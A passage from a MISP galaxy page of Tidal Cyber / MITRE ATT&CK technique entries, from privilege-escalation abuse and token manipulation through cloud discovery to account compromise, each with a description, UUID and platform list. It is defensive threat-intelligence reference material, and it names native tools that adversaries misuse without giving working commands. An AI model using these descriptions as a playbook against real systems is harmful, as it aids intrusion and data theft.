Skip to content

Hide Navigation Hide TOC

Edit

Tidal Technique

Tidal Technique Cluster

Authors
Authors and/or Contributors
Tidal Cyber

Abuse Elevation Control Mechanism

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.[TechNet How UAC Works][sudo man page 2018] An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.[OSX Keydnap malware][Fortinet Fareit]

Internal MISP references

UUID ac7d9875-d18b-48f6-93e6-47c565f9526b which can be used as unique global reference for Abuse Elevation Control Mechanism in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Access Token Manipulation

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[Pentestlab Token Manipulation]

Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

Internal MISP references

UUID 1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041 which can be used as unique global reference for Access Token Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Account Access Removal

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a System Shutdown/Reboot to set malicious changes into place.[CarbonBlack LockerGoga 2019][Unit42 LockerGoga 2019]

In Windows, Net utility, Set-LocalUser and Set-ADAccountPassword PowerShell cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as Data Destruction and Defacement, in order to impede incident response/recovery before completing the Data Encrypted for Impact objective.

Internal MISP references

UUID 847fcc8a-e74d-41e2-9f05-8d79d990cc04 which can be used as unique global reference for Account Access Removal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Account Discovery

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.[AWS List Users][Google Cloud - IAM Servie Accounts List API] On hosts, adversaries can use default PowerShell and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

Internal MISP references

UUID 6736995e-b9ea-401b-81fa-6caeb7a17ce3 which can be used as unique global reference for Account Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.[FireEye SMOKEDHAM June 2021] These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged Valid Accounts.

Internal MISP references

UUID 65f7482c-485b-4fd7-80f5-0ec6e923ac4d which can be used as unique global reference for Account Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Acquire Access

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers][Krebs Access Brokers Fortune 500] In some cases, adversary groups may form partnerships to share compromised systems with each other.[CISA Karakurt 2022]

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., Web Shell) or established access via External Remote Services. In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.[Microsoft Ransomware as a Service]

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers]

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a Trusted Relationship, Multi-Factor Authentication Interception, or even Supply Chain Compromise.

Note: while this technique is distinct from other behaviors such as Purchase Technical Data and Credentials, they may often be used in conjunction (especially where the acquired foothold requires Valid Accounts).

Internal MISP references

UUID 478da817-1914-50f6-b1fd-434081a34354 which can be used as unique global reference for Acquire Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Acquire Infrastructure

Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.[TrendmicroHideoutsLease] Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.[Free Trial PurpleUrchin] Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support Proxy, including from residential proxy services.[amnesty_nso_pegasus][FBI Proxies Credential Stuffing][Mandiant APT29 Microsoft 365 2022] Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

Internal MISP references

UUID 66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3 which can be used as unique global reference for Acquire Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Active Scanning

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.[Botnet Scan][OWASP Fingerprinting] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).

Internal MISP references

UUID a930437d-5a12-4dc4-b311-f5fd6a766c85 which can be used as unique global reference for Active Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Adversary-in-the-Middle

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.[Rapid7 MiTM Basics]

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.[ttint_rat][dns_changer_trojans][ad_blocker_with_miner] Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens (Steal Application Access Token) and session cookies (Steal Web Session Cookie).[volexity_0day_sophos_FW][Token tactics] Downgrade Attacks can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.[mitm_tls_downgrade_att][taxonomy_downgrade_att_tls][tlseminar_downgrade_att]

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in Transmitted Data Manipulation. Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to Impair Defenses and/or in support of a Network Denial of Service.

Internal MISP references

UUID d98dbf30-c454-42ff-a9f3-2cd3319cc0d9 which can be used as unique global reference for Adversary-in-the-Middle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Application Layer Protocol

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.[Mandiant APT29 Eye Spy Email Nov 22]

Internal MISP references

UUID 8a7afe43-b814-41b3-8bd8-e1301b8ba5b4 which can be used as unique global reference for Application Layer Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Application Window Discovery

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.[Prevailion DarkWatchman 2021] For example, information about application windows could be used identify potential data to collect as well as identifying security tooling (Security Software Discovery) to evade.[ESET Grandoreiro April 2020]

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as Command and Scripting Interpreter commands and Native API functions.

Internal MISP references

UUID 3b2f435a-8666-43b5-9883-f2808eebd726 which can be used as unique global reference for Application Window Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Archive Collected Data

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.[DOJ GRU Indictment Jul 2018] Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

Internal MISP references

UUID ebd3f870-c513-4fb0-b133-15ffc1f91db2 which can be used as unique global reference for Archive Collected Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Audio Capture

An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.[ESET Attor Oct 2019]

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Internal MISP references

UUID 2be5c67a-edae-4083-8b6d-f99eaa622ed4 which can be used as unique global reference for Audio Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Automated Collection

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.

In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.[Mandiant UNC3944 SMS Phishing 2023]

This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.

Internal MISP references

UUID 107ad6c5-79b1-468c-9519-1578bee2ac49 which can be used as unique global reference for Automated Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.[ESET Gamaredon June 2020]

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Internal MISP references

UUID 26abc19f-5968-45f1-aa1f-f35863a2f804 which can be used as unique global reference for Automated Exfiltration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

BITS Jobs

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).[Microsoft COM][Microsoft BITS] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.[Microsoft BITS][Microsoft BITSAdmin]

Adversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.[CTU BITS Malware June 2016][Mondok Windows PiggyBack BITS May 2007][Symantec BITS May 2007] BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[PaloAlto UBoatRAT Nov 2017][CTU BITS Malware June 2016]

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.[CTU BITS Malware June 2016]

Internal MISP references

UUID 6b278e5d-7383-42a4-9425-2da79bbe43e0 which can be used as unique global reference for BITS Jobs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Boot or Logon Autostart Execution

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[Microsoft Run Key][MSDN Authentication Packages][Microsoft TimeProvider][Cylance Reg Persistence Sept 2013][Linux Kernel Programming] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

Internal MISP references

UUID 17b97c19-b986-4653-850a-44aee9aaaba1 which can be used as unique global reference for Boot or Logon Autostart Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Boot or Logon Initialization Scripts

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.[Mandiant APT29 Eye Spy Email Nov 22][Anomali Rocke March 2019] Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Internal MISP references

UUID c51f799b-7305-43db-8d3b-657965cad68a which can be used as unique global reference for Boot or Logon Initialization Scripts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Extensions

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[Wikipedia Browser Extension][Chrome Extensions Definition]

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.[Malicious Chrome Extension Numbers] Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.[xorrior chrome extensions macOS]

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.[Chrome Extension Crypto Miner][ICEBRG Chrome Extensions][Banker Google Chrome Extension Steals Creds][Catch All Chrome Extension]

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for Command and Control.[Stantinko Botnet][Chrome Extension C2 Malware] Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for Defense Evasion.[Browers FriarFox][Browser Adrozek]

Internal MISP references

UUID 040804f6-6a87-4011-8716-66682bc16ed4 which can be used as unique global reference for Browser Extensions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Information Discovery

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.[Kaspersky Autofill]

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).[Chrome Roaming Profiles]

Internal MISP references

UUID f1af5c8b-3210-4788-a873-97b1518bb43a which can be used as unique global reference for Browser Information Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Session Hijacking

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.[Wikipedia Man in the Browser]

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.[Cobalt Strike Browser Pivot][ICEBRG Chrome Extensions] Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.[cobaltstrike manual]

Internal MISP references

UUID b57c5554-5a46-42cd-be7e-4206f79ef424 which can be used as unique global reference for Browser Session Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Brute Force

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.[TrendMicro Pawn Storm Dec 2020] Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.[Dragos Crashoverride 2018] Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery. Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access.

Internal MISP references

UUID c16eef78-232e-47a2-98e9-046ec075b13c which can be used as unique global reference for Brute Force in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Build Image on Host

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.[Docker Build Image]

An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize Deploy Container using that custom image.[Aqua Build Images on Hosts][Aqua Security Cloud Native Threat Report June 2021] If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

Internal MISP references

UUID 49749e13-48ed-49fc-82d1-13ae13b457c1 which can be used as unique global reference for Build Image on Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Clipboard Data

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.[MSDN Clipboard][clip_win_server][CISA_AA21_200B] Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation).[mining_ruby_reversinglabs]

macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.[Operating with EmPyre]

Internal MISP references

UUID e8f90b73-2e59-4643-a274-78b85b8d9f88 which can be used as unique global reference for Clipboard Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Administration Command

Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. [AWS Systems Manager Run Command][Microsoft Run Command]

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a Trusted Relationship to execute commands in connected virtual machines.[MSTIC Nobelium Oct 2021]

Internal MISP references

UUID 944a7b91-c58e-567d-9e2c-515b93713c50 which can be used as unique global reference for Cloud Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Infrastructure Discovery

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.[Amazon Describe Instance][Amazon Describe Instances API][AWS Get Public Access Block][AWS Head Bucket] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project [Google Compute Instances], and Azure's CLI command az vm list lists details of virtual machines.[Microsoft AZ CLI] In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning.[Malwarebytes OSINT Leaky Buckets - Hioureas]

An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.[Expel IO Evil in AWS] The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.[Mandiant M-Trends 2020]An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. [AWS Describe DB Instances] Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.

Internal MISP references

UUID fd346e4e-b22f-4cae-bc24-946d7b14b5e1 which can be used as unique global reference for Cloud Infrastructure Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Service Dashboard

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[Google Command Center Dashboard]

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

Internal MISP references

UUID 315ce434-ad6d-4dae-a1dd-6db944a44422 which can be used as unique global reference for Cloud Service Dashboard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Service Discovery

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[Azure - Resource Manager API][Azure AD Graph API]

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[Azure - Stormspotter][GitHub Pacu]

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.

Internal MISP references

UUID 5d0a3722-52b6-4968-a367-7ca6bc9a33fc which can be used as unique global reference for Cloud Service Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Storage Object Discovery

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS [ListObjectsV2] and List Blobs in Azure[List Blobs] .

Internal MISP references

UUID 92761d92-a288-4407-a112-bb2720f07d07 which can be used as unique global reference for Cloud Storage Object Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.[Powershell Remote Commands][Cisco IOS Software Integrity Assurance - Command History][Remote Shell Execution in Python]

Internal MISP references

UUID a2184d53-63b1-4c40-81ed-da799080c36c which can be used as unique global reference for Command and Scripting Interpreter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Communication Through Removable Media

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.[ESET Sednit USBStealer 2014] Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

Internal MISP references

UUID 0783c499-1564-4062-addc-f1ff86ef4e59 which can be used as unique global reference for Communication Through Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Compromise Accounts

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

